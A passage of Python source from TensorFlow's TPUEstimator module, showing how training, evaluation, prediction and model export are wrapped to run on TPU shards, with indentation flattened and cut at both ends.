# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(
math.ceil(
float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(self._config, train_batch_size,
eval_batch_size,
predict_batch_size, use_tpu,
eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not (isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion)
or export_saved_model_api_version == 1
or export_saved_model_api_version == 2):
raise ValueError('export_saved_model_api_version should be 1 or 2; '
'got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
tf.compat.v1.logging.warn(
'TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tf.saved_model.SERVING, tf.saved_model.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if (
(self._export_saved_model_api_version ==
ExportSavedModelApiVersion.V1)
or self._export_saved_model_api_version == 1):
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator,
self)._call_model_fn(features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator,
self)._convert_train_steps_to_hooks(steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode, input_context=None):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
input_context: Optional instance of `tf.distribute.InputContext`.
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
if 'input_context' in input_fn_args:
kwargs['input_context'] = input_context
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with tf.compat.v1.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
tf.compat.v1.logging.info('Running %s on CPU/GPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = tf.compat.v1.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters))
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' %
shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with tf.control_dependencies([loss]):
global_step = tf.identity(tf.compat.v1.train.get_global_step())
hooks = input_hooks + shutdown_hooks
if ctx.feed_hook is not None:
tf.compat.v1.logging.info(
'Use user implemented tpu infeed outfeed session hook class.')
infeed_outfeed_session_hook_class = ctx.feed_hook
else:
infeed_outfeed_session_hook_class = TPUInfeedOutfeedSessionHook
hooks.extend([
infeed_outfeed_session_hook_class(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(
tf.compat.v1.train.LoggingTensorHook(
{
'loss': tf.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = tf.compat.v1.train.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold,
save_graph_def=self._config.checkpoint_save_graph_def)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
else:
tf.compat.v1.logging.info('Bypassing TPUEstimator hook')
tf.compat.v1.summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with tf.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph(ctx)
train_op = tf.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict))
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = tf.compat.v1.div(
total_loss,
tf.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with tf.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with tf.control_dependencies(internal_ops_to_run):
dummy_update_op = tf.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with tf.control_dependencies(internal_ops_to_run):
mean_loss = tf.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls, scaffold_fn,
prediction_hooks) = _predict_on_tpu_system(ctx, model_fn_wrapper,
dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with tf.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with tf.control_dependencies(internal_ops_to_run):
dummy_predict_op = tf.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with tf.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx,
enqueue_ops,
host_ops,
rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and isinstance(
cluster, tf.distribute.cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with tf.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
iterations = tf.identity(iterations_per_loop_var)
return tf.compat.v1.while_loop(
lambda i: i < iterations,
computation, [tf.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return tf.math.logical_not(_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with tf.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
return tf.compat.v1.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph(ctx):
"""Validate graph before running distributed training.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = tf.compat.v1.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops and ctx.num_replicas > 1:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
